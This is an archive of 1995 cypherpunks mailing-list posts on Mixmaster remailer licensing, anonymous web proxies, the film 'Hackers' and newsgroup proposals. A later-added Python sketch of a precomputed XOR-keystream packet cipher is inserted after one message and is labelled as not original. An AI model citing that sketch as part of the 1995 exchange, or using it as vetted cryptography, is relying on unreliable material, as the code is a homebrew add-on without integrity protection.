Maybe it violates some rules about spreading information, knowledge
of where to find 'offending' materials, but this is certainly not
breaking any export rules... IMO

dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Sat, 16 Sep 95 18:45:50 PDT
To: remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
In-Reply-To: <199509161921.MAA05294@infinity.c2.org>
Message-ID: <m0su8nK-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Date: Sat, 16 Sep 1995 12:21:04 -0700
   From: "syrinx@c2.org (Syrinx Anonymous Remailer)" <syrinx@c2.org>

   The concern is not "commercialization", per se, but rather the use
   of "commercialization" as an excuse to build in "proprietary"
   features (Back doors?) for which no corresponding source code is
   involved.

And the chief concern with the Clipper chip?  That it was secret.  In
the crypto world, secret == untrustable.  Who would use a remailing
network that was not trustable?  Who would use it when every
cypherpunk says not to?

   Since no one has made a good case for there even being a COMMERCIAL
   market for Mixmaster, could there be other motives?

Value is created by seeing a market that no one else sees.  Obvious
markets have low margins, and they're getting lower and lower as
computers help implement the obvious.

   Without building an anonymous e-$ infrastructure first, there's no
   way to even charge for the use of a remailing service without
   sacrificing anonymity, even if people were willing to pay to have
   messages anonymously remailed.

Maybe someone *does* see a way to create a system?  If *you* knew,
would you tell everyone about it?  Or would you implement it, and rake
in the bucks?

   No, I'm not accusing Lance.  But if he no longer has the time to
   support Mixmaster, then perhaps some other crypto-friendly group
   should take over the task and keep it an OPEN system, with source
   code available.  In fact, even freezing Mixmaster as is would be
   preferable to "improvements" that people don't/can't trust.

Since you have no reputation to impugn, I feel free to be rude: "Put
up or shut up."  If you have the resources to improve Mixmaster so
that it's easy to use, do it.  If not, please don't stand in the way
of people who *do* have the resources.

-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMFt8wKbBSWSDlCdBAQEXGgQAo7Sl+CctvGWSGsQpeYYzMit+9eBN2iP/
Sq5k3FvHATDEJaPMTEq7PQRlQrrOkKF7jg2d0wnxJ9tFG+5ymV6SeLiJE/KXuOSI
dD5oR6TOVf50ppLIjyQZhhOymon3RuJqHqQVyX7qD2ph792SACuAFvrFTlZoRkgB
8jPr7TLkIyA=
=NygP
-----END PGP SIGNATURE-----

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 16 Sep 95 22:22:19 PDT
To: adam@bwh.harvard.edu
Subject: Re: Commercial Mixmaster
Message-ID: <199509170513.AA06296@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:

>	It's worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK).  People use it because they trust Julf, or
> trust people who trust Julf.

People don't use Julf's source code. People use the services provided
by Julf's remailer, which runs Julf's source. Trusting anon.penet is
relatively simple (conceptually) because the author, distributor, and
user of the remailer code (where user = remailer operator) are all
the same person. I would be less likely to trust Julf if I thought he
was running software he received (through unknown distribution channels,
from an unknown author) as an executable without source.

I trust Julf because (a) he seems to be a decent/trustworthy person,
and (b) because I think he has enough information available to him
to be sure that his system doesn't have intentional back doors nor
glaring unintentional ones. If only one of (a) and (b) were true,
I'd trust anon.penet.fi a lot less. 

I've seen messages from people who refuse to use ViaCrypt PGP because
they can't see the source. I own a copy because I don't want to worry
about licensing when I use it in a commercial context and because I
don't think Phil would have been associated with it if the binaries
distributed weren't free of known weaknesses different from those
documented with the freeware PGP or otherwise disclosed.

My inclination is to feel the same way about distributions of 
Mixmaster. If Lance is willing to sign the code which is shipped,
my hunch is that there's nothing tricky going on. If Lance disappears,
and the purchaser turns out to be unknown, I dunno if I'd run it 
before someone trusted had disassembled it (or someone liberated
the source code) and it was inspected and found to be clean.

[I think it's useful to continue beating the almost-dead horse of
the marketing of Mixmaster because I suspect that the anonymous
purchaser of Mixmaster subscribes to the list, and is thereby
aware of what potential remailer operators and remailer users
are going to like, and not like.]

> 	Why pay for remailers when there are free ones?  Speed and
> lawyers pop right up as damn good answers.  Putting up a couple of
> p120s on a T1 in the Caribbean isn't cheap, nor is making sure you
> have a good lawyer who'll protect the machines when the bad guys show
> up with warrants.  I'd be much happier to use a fast system on good
> legal ground than a freebie.

It's safer still to use a system which doesn't keep logs and has 
otherwise taken steps to minimize inadvertent data leakage. (Imagine
me mentioning here all of the by now tiresome ideas about thermite,
degaussers, low-level-formats of the HD, etc, etc. Please, please,
let's not start that thread again for at least 6 months.) 

I'm not sure that there are any special lawyer tricks to stop the
execution of a search/seizure warrant. An attorney may help you
keep items found out of court later. I suppose it'd be possible, if
the cops were cooperative and the attorney immediately available and
the magistrate/judge who signed the warrant was immediately
available to try to stop the execution of the warrant, but that seems
pretty far-fetched. I've been reading a lot of search & seizure
cases lately for work and haven't seen anything like this mentioned,
ever. If anyone's got a cite for "how to stop a warrant search &
seizure in progress", please pass it along. I'm sure my boss (and
his clients) would be interested. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFuuJn3YhjZY3fMNAQGsRAP+PIm6ZsjfCFetFr0//LPUuBg+tiK9b8Dh
4WXji1ab6kCfB+SCbNhU7IDNCR7pK7c1rWjVL+r0gbded46Um6+mn5hDKagKhztD
nqld1vTETJFX9TmsRe3mXBE/TW1pqysoiS3PnM4mZ8b0GjErOdSbNpxOizvBOdhi
jLoNKnEGnpA=
=3dgI
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sat, 16 Sep 95 22:18:02 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <199509170517.WAA16625@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



|  + Chaining would be a imo good idea (ie cli <-> anonproxy1 <->
|    anonproxy2 <-> ... <-> server) but how would you manage to tell
|    your favorite web browser to add in its header something like
|    Http-Proxy-List: anonproxy2, ...
|    An alternative would be to have a database of available (running)
|    proxies and that the proxy itself randomly chooses a next route ?

Don't most of the browsers support a "firewall-proxy-mode", where
all queries are sent off to a special daemon, that forwards the query
on? This would probably be the place to add the header-munging.

How do you plan to get the reverse-path working? Having an
encrypted/chained return path in the request?

|  + A way to solve previous pb and to add in encryption (but would it
|    be fast enough for web browsing ?) would be that each user runs a
|    local proxy (that could be optionally used by other folks) that
|    would do pgp encryption/decryption, 'routing' selection,etc...
| 
| Would ppl with mail remailers and/or W3 experience comment ?
| (or tell me the pointer toward the already solved, already implemented
| beast that would do the above)

Encryption speed isn't all that an issue always. I'm planning to do an
Mbone encryption gateway, (RSN). I will precompute a cryptographic
mask during idle cycles, that can be XORed together with the
clear-text packet when it arrives. I expect it to reduce the latency
quite a lot. (This might not work, since it assumes the key distr
problem is already solved in good time before the packet arrives, to
be able to amass "precomputational power".)

/Christian
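
The precomputed-mask idea in the message above, as an added example that is not part of the original post: masks are generated during idle time, and a packet is encrypted on arrival with a single XOR. The HMAC-SHA256 counter-mode keystream, the 8-byte sequence header, the 1500-byte MTU and the names `MaskPool` and `Receiver` are assumptions of this sketch; the key is assumed to be shared in advance, as the message notes.

```python
import hashlib
import hmac
from collections import deque

MTU = 1500  # assumed maximum payload; masks are precomputed at this length


def make_mask(key: bytes, seq: int, length: int = MTU) -> bytes:
    """Keystream for packet `seq`: HMAC-SHA256(key, seq || block counter)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        msg = seq.to_bytes(8, "big") + block.to_bytes(4, "big")
        out += hmac.new(key, msg, hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def xor(data: bytes, mask: bytes) -> bytes:
    """XOR data with the leading bytes of mask (mask must be at least as long)."""
    return bytes(d ^ m for d, m in zip(data, mask))


class MaskPool:
    """Sender side: spend idle cycles on masks, spend one XOR per packet."""

    def __init__(self, key: bytes):
        self.key = key
        self.next_seq = 0      # sequence numbers are never reused
        self.pool = deque()    # (seq, mask) pairs waiting for a packet
        self.hits = 0          # packets served from a precomputed mask
        self.misses = 0        # packets that had to compute a mask on arrival

    def precompute(self, count: int) -> None:
        """Call while idle: the expensive work happens here."""
        for _ in range(count):
            self.pool.append((self.next_seq, make_mask(self.key, self.next_seq)))
            self.next_seq += 1

    def seal(self, payload: bytes) -> bytes:
        """Encrypt one packet; the wire format is seq (8 bytes) || ciphertext."""
        if len(payload) > MTU:
            raise ValueError("payload larger than a precomputed mask")
        if self.pool:
            seq, mask = self.pool.popleft()   # fast path: XOR only
            self.hits += 1
        else:
            seq = self.next_seq               # slow path: pool ran dry
            self.next_seq += 1
            mask = make_mask(self.key, seq, len(payload))
            self.misses += 1
        # Each mask is consumed exactly once. Reusing a mask for two packets
        # would leak the XOR of their plaintexts.
        return seq.to_bytes(8, "big") + xor(payload, mask)


class Receiver:
    """Receiver side: regenerates the mask from the sequence number."""

    def __init__(self, key: bytes):
        self.key = key
        self.seen = set()

    def open(self, packet: bytes) -> bytes:
        if len(packet) < 8:
            raise ValueError("packet shorter than the sequence header")
        seq = int.from_bytes(packet[:8], "big")
        if seq in self.seen:
            raise ValueError("replayed sequence number")
        self.seen.add(seq)
        body = packet[8:]
        # XOR alone gives no integrity: a real gateway would also need a MAC
        # over the header and ciphertext, which this sketch leaves out.
        return xor(body, make_mask(self.key, seq, len(body)))


if __name__ == "__main__":
    key = b"constructed-demo-key"   # constructed sample key
    tx, rx = MaskPool(key), Receiver(key)
    tx.precompute(2)
    for text in (b"first", b"second", b"third"):
        print(rx.open(tx.seal(text)), tx.hits, tx.misses)
```
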




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 16 Sep 95 19:18:16 PDT
To: steven@echonyc.com (Steven Levy)
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509162002.A11836-0100000@echonyc>
Message-ID: <199509170217.WAA10568@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 
> 
> It may not be a crime, but it's not nice to steal a title.

 I think there's a high probability of someone independently inventing
the title "hackers" for this movie rather than steal it. It's not
very original. Besides, the content of your book has very little
to do with this movie. The movie would be more appropriately
titled "crackers" or "phreakers"

-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 16 Sep 95 15:31:40 PDT
To: tcmay@got.net
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <16598.9509162230@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> Should there be an "alt.cypherpunks" type of newsgroup instead of this
> mailing list?

Not instead of, that would *kill it* with all the effects every one
has been quick to point out, things like more noise, cross posts, loss
of community like atmosphere.  Please don't anyone do that!

My 2nd post on the subject just before yours in my mbox, contains my
negative views on this idea.

I just thought it would be a good medium for a separate discussion
forum for Peter's proposed 'technology transfer', and public awareness
idea.  I am really not keen on combining the two, I think if there
is a need for it, and it gets created at all, it should be as a
separate forum.

> It would be easy to create "alt.cypherpunks." I've been expecting to
> see it happen for the last 3 years. It could still happen. In fact,
> there's been talk of doing it (sorry for the passive "there has been
> talk," but I'll let the folks talking about doing it do the talking
> about it here).

Sure, alt groups are easy to create there was a series of them in our
spool with names from alt.-.-.-.-.0.0.0.0.0 through
alt.-.-.-.-.-9.9.9.9.9 or something like that till some admin cleaned
them up, or some one put out a cancel for them.

> [more on why cpunks should stay as it is]
> 
> In some sense, the Cypherpunks list is somewhere in-between a full
> newsgroup and a small working mailing list.

Couldn't agree more.  Keep cpunks the way it is.

> Second, would the benefits of wider exposure, as "alt.cypherpunks,"
> more than balance out the negative effects mentioned above?

Don't think it'd be worth destroying the cypherpunks list over,
alt.groups are great for censorship free discussion, (alt.security.pgp
and some of the other crypto groups have their good moments, and there
are quite a few people who frequent the a.s.pgp group acting as pgp
gurus answering questions systematically at the rate of half a dozen
a day or so it would seem.  It's gotten to the stage where a pgp
newcomer can post how do you blah fingerprint blah, and there will be
a whole bevy of regulars keen to help.  Probably is very useful for
PGP newbies.), so perhaps an alt.cypherpunks could develop this kind
of a use.  But some people view alt.* groups with disdain and don't
look at them, so it might depend on the intended audience.  Wider
audience might be achieved with a comp, or other big8 group.

I thought recently about writing a cpunk technology FAQ, even got
started with a list of what I wanted to include.  What I wanted to do
was to gather together pointers to all of the available technology
available, crypto libraries, disk encryptors, remailers, etc, in a
form which would be a useful quick reference, to know just what was
available, it can sometimes be tricky to find all of these things, as
you see people asking about disk encryptors in a.s.pgp, and about
remailers, etc.

I just got finished with the contents list, when I came across by
browsing someone's cpunks page, Tatu Ylonen's 'International
Cryptography Pages', so I junked my 'table of contents only' FAQ at
that point because he had done it all, in comprehensive detail.  I
reckon perhaps WWW is a useful way to put across info, most of the
FAQs which get posted to newsgroups have a WWW home, or end up being
WWW only, and not posted at all, or pointer only.

I'm really impressed with Tatu's pages, take a look if you haven't
seen it as it's a really good cypherpunks technology resource guide,
the software packages section is likely very useful reading, and would
answer a lot of FAQ like questions for some people with security, and
privacy questions.  I reckon perhaps some of Peter's aims could be
furthered by posting Tatu's pointer as a FAQ to a few of the crypto
and security groups:

	http://www.cs.hut.fi/ssh/crypto/

> This brings up a final point, with more than 10,000 newsgroups,
> including nearly a dozen devoted to crypto, PGP, security, and
> anonymity, aren't there already enough? A likely effect of
> "alt.cypherpunks" is this:
>
> From: david@sternlight.com (David Sternlight)
> Newsgroups: sci.crypt,alt.security.pgp,talk.politics.crypto,alt.cypherpunks

Yeah, that is a problem, all the security groups seem to get merged,
much to the annoyance of people on sci.crypt, and leading to the
creation of sci.crypt.research.

Also the point of there being lots of newsgroups already is
interesting because when you look at the crypto and privacy related
groups there are already a whole load of related ones.  It is just the
noise ratio on most of them is rather bad.

Perhaps a systematic posting of some useful FAQs and URLs would
generate a useful effect in terms of increasing use and awareness of
cryptographic solutions to security problems, and as privacy
preserving methods.  Larry Detweiler used to post the CRAM series,
some of the info disseminated was useful.  Perhaps a similar approach
could be taken, posting cypherpunks technology FAQs to relevant
groups.  MPJ's getting PGP FAQ has lots of PGP info, something similar
or just the insistent, helpful reposting of Tatu's URL in places where
people ask about such info might be useful.

> But, if anyone wants it, create it. Then people can vote with their
> feet.  Both the list and the newsgroup can co-exist, and if the
> newsgroup "wins," the list can be dropped.

I for one would prefer to see it in a co-exist mode, with different
objectives.  I'll go away now, and let Peter continue, if he hasn't
been put off by the mixed responses.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 16 Sep 95 20:49:58 PDT
To: nelson@crynwr.com (Russell Nelson)
Subject: Re: Commercial Mixmaster
In-Reply-To: <m0su8nK-000H93C@ns.crynwr.com>
Message-ID: <199509170348.XAA06314@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	It's worth noting that the source code to Julf's Penet remailer
is not public (AFAIK).  People use it because they trust Julf, or
trust people who trust Julf.

	There is clearly a market for anonymizing services in various
forms.  Hopefully, whoever is putting up cash is also looking at
building a web proxy service, a pseudonymous system, and a mail
drop/data haven type of operation (although the last might not fit in
as well.)

	If you don't see a market, I suggest you drop a line offering
services to the friendly folks at presiednt@whitehouse.gov.  I'm sure
they'd prefer a bit of privacy.

	Why pay for remailers when there are free ones?  Speed and
lawyers pop right up as damn good answers.  Putting up a couple of
p120s on a T1 in the Caribbean isn't cheap, nor is making sure you
have a good lawyer who'll protect the machines when the bad guys show
up with warrants.  I'd be much happier to use a fast system on good
legal ground than a freebie.

Adam


Russ Nelson wrote:

|    The concern is not "commercialization", per se, but rather the use
|    of "commercialization" as an excuse to build in "proprietary"
|    features (Back doors?) for which no corresponding source code is
|    involved.
| 
| And the chief concern with the Clipper chip?  That it was secret.  In
| the crypto world, secret == untrustable.  Who would use a remailing
| network that was not trustable?  Who would use it when every
| cypherpunk says not to?
| 
|    Since no one has made a good case for there even being a COMMERCIAL
|    market for Mixmaster, could there be other motives?
| 
| Value is created by seeing a market that no one else sees.  Obvious
| markets have low margins, and they're getting lower and lower as
| computers help implement the obvious.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 16 Sep 95 21:30:30 PDT
To: cypherpunks@toad.com
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509162002.A11836-0100000@echonyc>
Message-ID: <9509170429.AA05221@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>is curiosity." 

I know companies who have spent millions cleaning up after a hacker break-in.
I've been up at two in the morning trying to stop a person with known mental
problems breaking into a site with some very dangerous computer controlled
machinery. I've dealt with people trying to get rich quick by defrauding others.
I've met some real evil bastards who simply want to ruin as many other people's
lives as they possibly can, including people that thought they were their
friends.

To me teenagers who break into computer systems are not funny at all, it's like
joyriding, it's funny until someone gets hurt. I know people who have got hurt
real bad.

I like having privacy, part of the cost of that privacy is respecting the 
privacy of others.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 16 Sep 95 22:39:10 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <Pine.SUN.3.90.950917003537.18626G-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


What's the problem of using CERN in proxy mode? You can even set it up to
do chaining.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Sun, 17 Sep 1995, Laurent Demailly wrote:

>  + If this has not been done before and is available ? (and where)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 17 Sep 95 00:55:18 PDT
To: remailer-operators@c2.org
Subject: Mixmaster Licensing Offer Explained
Message-ID: <199509170754.AAA23527@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Lance Cottrell <loki@obscura.com>
Date: 17 September 1995
Subject: Mixmaster Licensing Offer Explained

 Permission is granted to distribute this document in any media for any
purpose as long as the entire document is distributed with the attached
digital signature intact, or the document is clearly marked as having been
modified with the locations of deleted text indicated.

Several rumors have surfaced following my announcement of Mixmaster's
changing status. I want to nip these worries in the bud. After discussion
with the party interested in commercially licensing Mixmaster we have
decided to explain the whole situation publicly.

The company offering to license Mixmaster is Phoenix DataNet, a Houston
area ISP. John Perry, a person well known to this list and the remailer
community in general, is a Senior Systems Administrator at Phoenix.

On Thursday I received a call from John. Some others at Phoenix had just
noticed a Mixmaster remailer he had been running on one of their machines.
Phoenix has several large corporate customers who need secure transactions
for some special applications. The core engine of Mixmaster is well suited
to that purpose. They offered to license the code from me to use as the
framework on which to build these other programs. In the process they will
rewrite many basic functions in Mixmaster that need major overhaul (e.g.,
key management). We will incorporate those improvements back into
Mixmaster. This should lead to porting Mixmaster to several other
platforms, and to fixing most of my worst coding atrocities.

I had never considered licensing Mixmaster, but I know John Perry both
personally and by reputation. He has thoroughly assuaged my fears that
Phoenix would try to weaken or restrict Mixmaster in any way. John will be
leading this project on the Phoenix end. He asked that I delay the release
of the next version of Mixmaster pending clarification of every one's
intentions. Now that we have reached an understanding the planned release
of Mixmaster version 2.0.2 will take place as soon as I can get it ready.

There are no plans to sell Mixmaster clients or servers. They will continue
to be released free with source code. I will still control the contents of
all releases of Mixmaster. All future versions of Mixmaster will be
backward compatible. There will be no "Legal Kludges" preventing old
clients from working with new remailers, and new clients will be able to
generate old message formats.  Currently there are no plans to change the
message format at all. 

      -Lance Cottrell

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFvVivPzr81BVjMVAQHzhgf/f9zM91/N0S/JljicjDpoGzQ6Pt4gZVy9
ar407vp6js7EJ7Kg2XHtni6FwowM066rbGrt8W/8ZoQJGBxgKkfSvhLpEL7E926M
tn5QDEysVa1itzkvym2rQuNRIALfLOwzcYyLMdfjBtPMhRJkfwDthrrl9ocHkrSR
WW1wPwBRj/t+LFl6ueXwN8ZYLJVmbIoLy7BcqbNzLWjqmB7jgN2toxVCRfM7qfkE
DX1M/+hPddE6dT8ZgWdSt9dUvMQ7hu8BfHKCkcf0XWKmmeJ8jh+XDISvC7EFgIGT
H5XjkLpA2Eg+qmYzKHDOQaQT9SfzSVs4Y9sTzMlbewBi3jna6Dz/Sw==
=G2pZ
-----END PGP SIGNATURE-----

-- 
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 16 Sep 95 16:47:55 PDT
To: cypherpunks@toad.com
Subject: Anonymous WWW proxies
Message-ID: <9509162347.AA09904@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm halfway in the coding of a simple anonymous WWW proxy, but before
going any further, I'd like to know:

 + If this has not been done before and is available ? (and where)
 + If there is any interest
 + Chaining would be a imo good idea (ie cli <-> anonproxy1 <->
   anonproxy2 <-> ... <-> server) but how would you manage to tell
   your favorite web browser to add in its header something like
   Http-Proxy-List: anonproxy2, ...
   An alternative would be to have a database of available (running)
   proxies and that the proxy itself randomly choose a next route ?
 + A way to solve previous pb and to add in encryption (but would it
   be fast enough for web browsing ?) would be that each user runs a
   local proxy (that could optionally be used by other folks) that
   would do pgp encryption/decryption, 'routing' selection,etc...

Would ppl with mail remailers and/or W3 experience comment ?
(or tell me the pointer toward the already solved, already implemented
beast that would do the above)

- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFtiGXk52/beodHxAQETVgP/avWKpD/AUiRPM0ljX0BH0e7q10KYEOdA
Hu+/Bsr7PWANdfhefs/ASrJn/kiOIQwo+RGV1K3UKWu7IyYdHHrINZkp0OcFlIR5
8TIfW6/FqBaUwAzuCV0/acUhXW6ah7xpPkgiHJ04Nlu8BKh72QGawJLJDoT2JmIi
o67LVdD5ajg=
=/kSM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 09:46:11 PDT
To: cypherpunks@toad.com
Subject: Trained Seals and Beltway Insiders
Message-ID: <ac819d3c1d021004d69d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:23 PM 9/17/95, Dave Banisar wrote:
>>
>>The Cypherpunks group is not like that. Lacking any formalized leadership,
>>and--most importantly--lacking offices in D.C., we can't be asked to
>>perform like the usual trained seals who produce the soundbites that fit
>>into the stories too many reporters want. Again, a weakness and a strength.
>
>Hey! Bark Bark Bark Bark
>
>Dave (partially trained seal protesting that description)


Well, sorry for letting my rhetorical excesses come to the fore!

On even days I think the work of the Washington lobbying/policy groups is
very useful, even if not always done the way I would do it. (Having grown
up just outside D.C., nothing would ever get me to live in that area again,
though.)

On odd days, I think of them as "Beltway insiders," with the same handful
of "spokeswonks" handling all of the issues, dealing with all of the press
conferences, attending the various D.C. events, and essentially being part
of the System.

I never did memorize what all those "estates" are, as in the Third and
Fourth Estates. But I think the Washington crowd has several components:
The Gubment (itself divided into several branches), the Press, the
Contractors, and the Lobbyists.

The "think tanks" which ring D.C. and other areas (Brookings, Cato, the new
Progress and Freedom Foundation, the military advisory think tanks, and a
dozen or more others) are an industry unto themselves. Add to these the
various lobbying groups (NRA, AMA, tobacco, Right to Life, etc.). And throw
in various national groups with D.C. offices. Quite a stew.

They all play off each other, with the lobbying groups trained to "give
good sound" to the reporters who want some quotable line about child porn,
or Clipper, or whatever.

Any conclusions for us? Maybe, but I won't touch them here.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sun, 17 Sep 95 07:21:57 PDT
To: cypherpunks@toad.com
Subject: Re: [ASSENT NOISE] Re: C-punks, marketing for the masses
Message-ID: <v01530501ac81deae00a0@[205.177.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


>
>The Cypherpunks group is not like that. Lacking any formalized leadership,
>and--most importantly--lacking offices in D.C., we can't be asked to
>perform like the usual trained seals who produce the soundbites that fit
>into the stories too many reporters want. Again, a weakness and a strength.

Hey! Bark Bark Bark Bark

Dave (partially trained seal protesting that description)

PS Sorry all for my last message that should have only gone to Bruce. I'm
claiming jetlag.


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Sun, 17 Sep 95 08:16:36 PDT
To: hallam@w3.org
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509170429.AA05221@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.950917111121.11534A-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995 hallam@w3.org wrote:

> I like having privacy, part of the cost of that privacy is respecting the 
> privacy of others.

And that's where we, the cypherpunks come in, by advocating strong 
cryptographic protocols and tools, we can keep every machine safe from 
intrusion; it's not just Uncle Sam's evil minions that should have total 
privacy; normal citizens need privacy too - the spooks shouldn't be the 
only ones with it.  :-)

This message has been brought to you by the Cypherpunks.  Use only 
Cypherpunks brand software ;-D

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 17 Sep 95 09:27:08 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr>
Message-ID: <Pine.SUN.3.90.950917112041.3532A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Points taken. But I believe there are (or will be) patches for CERN to do
SSL. Check the SSLeay ssl-user mailing list.

While we're talking about anonymous proxies, I always wanted to set up an IP
anonymous proxy using Linux IP tunnel and maybe also IP
Masquerading. This would allow people to have anonymous Web Servers, etc.
(But as anything it would probably be abused for hacking, etc. at no end).
Any comments?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Sun, 17 Sep 1995, Laurent Demailly wrote:

> The chaining is not dynamic (but it is maybe patchable)?
> I don't think there is support for encryption (ssl patches maybe?) ?
> Also, CERN httpd is a huge thing, maybe some smaller proxy would
> do... 
> My development is/could be based on my httpd, but simplified... I'll
> have a look at standalone already existing proxies before reinventing
> the wheel...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Sun, 17 Sep 95 08:45:57 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: AOL monitoring
In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com>
Message-ID: <Pine.SUN.3.91.950917113021.11534E@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


This sounds fishy to me.  Why would AOL need to download the databases of 
files you've downloaded to your hard drive?  I'm 99.9999% sure that they 
